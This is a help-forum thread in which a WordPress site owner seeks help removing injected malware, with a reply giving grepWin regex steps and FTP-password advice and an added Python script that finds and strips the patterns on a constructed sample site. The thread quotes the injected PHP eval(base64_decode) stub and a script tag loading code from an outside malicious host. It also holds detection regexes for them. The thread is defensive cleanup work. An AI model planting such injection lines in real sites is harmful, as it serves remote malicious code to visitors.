Wordpress - Malware attack on my site! HELP!
by kimo2012
about 1 month ago

First off, the website is www.bigtimerushtv.com. Over the past 4 days, I have changed my passwords 3 different times as well as manually removing code from each file. I spoke with my host who suggested I download my files, run a scan, and fix the files with the javascript on it… unsuccessful all the times I tried it.

I read a few of the threads on here and it seemed to be a foreign language to me. Here are the two codes that I recognized:

<?php eval(base64_decode(‘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’)); ?>

and

<script src=http://kifil.com/Outletcuadros/Principal.php ></sc ript>

I noticed in one of the other threads on here (http://badwarebusters.org/main/itemview/14451#itemblock-14459) that a third code was found but I can’t find anything similar to it.

If anyone could PLEASE help me, I’d appreciate it!

by mBlue
about 1 month ago

Hello Sir,

Please provide your website URL so we can scan your site.

Regards,
Simon
soswebscan.com

by WeWatch
about 1 month ago

If you’re ready to do this yourself, I’ll provide the search strings and the free tools.

First, download grepWin. It’s free. http://code.google.com/p/grepwin/downloads/list I recommend the .msi file

If those are the only 2 codes (malscripts) you’re finding on your site then you can use these 2 regex search strings in grepWin:

For the first you identified in your post use:

<\?php\s*eval\(base64_decode\(['"].*?['"].*?\)\);\s*\?>

And for the second malscript use:

<script src=http:\/\/.*?\.php\s></script>

Often times if you see the above code, you might also see some malscripts at the bottom of various .js files.

If so, you can use this regex search string to find and remove them:

document\.write\(\'<script src=http:\/\/.*?\.php\s><\\/script>\'\);

So, once you open up grepWin, assuming you’ve already downloaded all of your files to your PC use these settings:

In the Search in: box use the button (…) to select the folder where your web files are located.

Select Regex search and in the Search for: box use the first string I provided above.

Leave Replace with: empty

And use the following settings:

uncheck Search case-sensitive
check Dot matches newline
check Create backup files
uncheck Treat files as UTF8
check All sizes
check Include system items
check Include hidden items
check Include subfolders

Then hit the Search button. I’d like you to see the files that it finds. If you right-click on one of them in the Search results window, you can open it in an editor (Wordpad) and scroll through the file to see the malscript. Do this on a few of the files.

Then when you’re ready, hit Replace. It will save the original file with a .bak extension and the normal file name will have that string removed.

Then repeat the process with the next search string.

Then, because these types of infections will happen over and over again, change all FTP passwords. If you’re using FileZilla or any one of the FTP programs listed here: http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/

then change to a different FTP program. I like WS_FTP by Ipswitch because they do encrypt the stored usernames and passwords.

The root cause of the re-infection could be a virus on a PC with FTP access to your website. This virus steals the FTP login credentials, sends them to a server which then infects your website. That might be why it’s happening over and over again.

The PHP code you found above is similar to what hackers install on websites, after they’ve logged in with the stolen FTP credentials, so they can re-infect the site without logging in.

You might have to use a different anti-virus program in order to find and remove the virus from a PC. I’ve had good success with Avast, F-Prot or Kaspersky. The reason is that the virus knows how to evade detection by your current anti-virus software. If you’re already using one of these, try one of the other ones. It has to be different.

Please post back here with any questions or updates.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
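The grepWin recipe above (regex search over a downloaded copy of the site, case-insensitive and dot-matches-newline, .bak backup, then replace the match with nothing) can also be done offline with a short script, which is handy when you want to see exactly which files were touched and read the injected PHP before deleting it. The following is an added example and is not grepWin, nor anything posted in this thread. It uses the three regexes from the post (with the `[\'|\"]` class tightened to `['"]`, since `|` inside a character class is a literal, and `\s` loosened to `\s*` before the closing `>`), builds a small constructed sample site in a temporary directory, cleans it, and reports what changed. The host `malware.example`, the file names and the base64 payload are all made up for the demonstration.

```python
#!/usr/bin/env python3
"""Offline search-and-strip for the three malscript patterns from the thread:
the PHP eval(base64_decode()) stub, the injected <script src=...php> tag, and
the document.write() variant appended to .js files. Added example; the sample
files it creates are constructed here, not taken from a real infection."""
import base64
import re
import shutil
import tempfile
from pathlib import Path

# The post's three regexes, run the way the grepWin recipe says:
# case-insensitive (re.I) and dot-matches-newline (re.S).
MALSCRIPT_PATTERNS = {
    "php_eval_base64": re.compile(
        r"""<\?php\s*eval\(base64_decode\(['"].*?['"].*?\)\);\s*\?>""", re.I | re.S),
    "script_src_php": re.compile(
        r"<script src=http://.*?\.php\s*></script>", re.I | re.S),
    "js_document_write": re.compile(
        r"document\.write\('<script src=http://.*?\.php\s*><\\/script>'\);", re.I | re.S),
}

# Only web files are scanned; anything else (images, text files) is left alone.
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".inc"}


def find_malscripts(text):
    """Return [(pattern_name, matched_text), ...] for every hit in text."""
    hits = []
    for name, rx in MALSCRIPT_PATTERNS.items():
        hits.extend((name, m.group(0)) for m in rx.finditer(text))
    return hits


def decode_eval_payload(stub):
    """Decode the base64 argument of an eval(base64_decode('...')) stub so the
    injected PHP can be read before it is deleted. Returns '' if the argument
    is not valid base64."""
    m = re.search(r"""base64_decode\(['"]([A-Za-z0-9+/=\s]+)['"]""", stub, re.I)
    if not m:
        return ""
    try:
        raw = base64.b64decode("".join(m.group(1).split()), validate=True)
        return raw.decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def clean_text(text):
    """Strip every match; return (cleaned_text, number_of_removals)."""
    total = 0
    for rx in MALSCRIPT_PATTERNS.values():
        text, n = rx.subn("", text)
        total += n
    return text, total


def clean_tree(root, backup=True):
    """Walk root (grepWin's 'Include subfolders'), clean each web file in place
    and keep a .bak copy of the original. Returns {relative_path: removals}
    for the files that were actually changed."""
    root = Path(root)
    changed = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        original = path.read_text(encoding="utf-8", errors="surrogateescape")
        cleaned, n = clean_text(original)
        if n == 0:
            continue
        if backup:
            shutil.copy2(path, path.with_name(path.name + ".bak"))
        path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
        changed[str(path.relative_to(root)).replace("\\", "/")] = n
    return changed


# Constructed samples: the payload in the original post was redacted, so a
# harmless stand-in is encoded here; host and paths are made up.
SAMPLE_PAYLOAD = 'echo "constructed sample payload";'
SAMPLE_STUB = "<?php eval(base64_decode('%s')); ?>" % (
    base64.b64encode(SAMPLE_PAYLOAD.encode()).decode())
SAMPLE_SCRIPT = "<script src=http://malware.example/path/loader.php ></script>"
SAMPLE_JS = "document.write('<script src=http://malware.example/path/loader.php ><\\/script>');"


def make_sample_site(root):
    """Lay out a tiny fake WordPress tree with two infected files and one clean one."""
    root = Path(root)
    (root / "wp-content").mkdir(parents=True)
    (root / "index.php").write_text(
        SAMPLE_STUB + "\n<?php\n// legitimate theme code\nget_header();\n" + SAMPLE_SCRIPT + "\n")
    (root / "wp-content" / "theme.js").write_text("function f(){}\n" + SAMPLE_JS + "\n")
    (root / "wp-content" / "clean.php").write_text("<?php echo 'fine'; ?>\n")
    (root / "readme.txt").write_text(SAMPLE_SCRIPT + "\n")  # wrong suffix: not scanned
    return root


def demo():
    """Build the sample site in a temp dir, clean it, and return the results."""
    tmp = Path(tempfile.mkdtemp())
    make_sample_site(tmp)
    before = find_malscripts((tmp / "index.php").read_text())
    changed = clean_tree(tmp)
    after = find_malscripts((tmp / "index.php").read_text())
    return {
        "hits_before": len(before),
        "changed": changed,
        "hits_after": len(after),
        "payload": decode_eval_payload(SAMPLE_STUB),
        "backup_exists": (tmp / "index.php.bak").exists(),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

As with the grepWin steps, look at what `find_malscripts` returns for a handful of files before running `clean_tree`: the lazy `.*?` with dot-matches-newline will normally stop at the first closing quote and `)); ?>`, but on a file with unusual quoting it can swallow more than the stub, and the .bak copies are the only way back.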

by kimo2012
about 1 month ago

Hi Thomas!

I replaced the malscript. Is it ready to be re-uploaded once I change my FTP password?

Also, I realized I didn’t have an antivirus software active on my computer. I bought BitDefender 2010.

Please let me know if there is anything I still need to do or can do.

THANK YOU A BUNCH!

by WeWatch
about 1 month ago

After you change the FTP password, re-upload it and then request a review from Google’s Webmaster Tools and you should be good.

Let the forum here know if you need another scan to be sure you got it all.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

by kimo2012
about 1 month ago

I changed the FTP password then I reuploaded the files.

Just FYI, my host provides WiseFTP. I saw your reference in your first reply.

Could you please scan and let me know what you find?

Thank you once more. MAJOR help!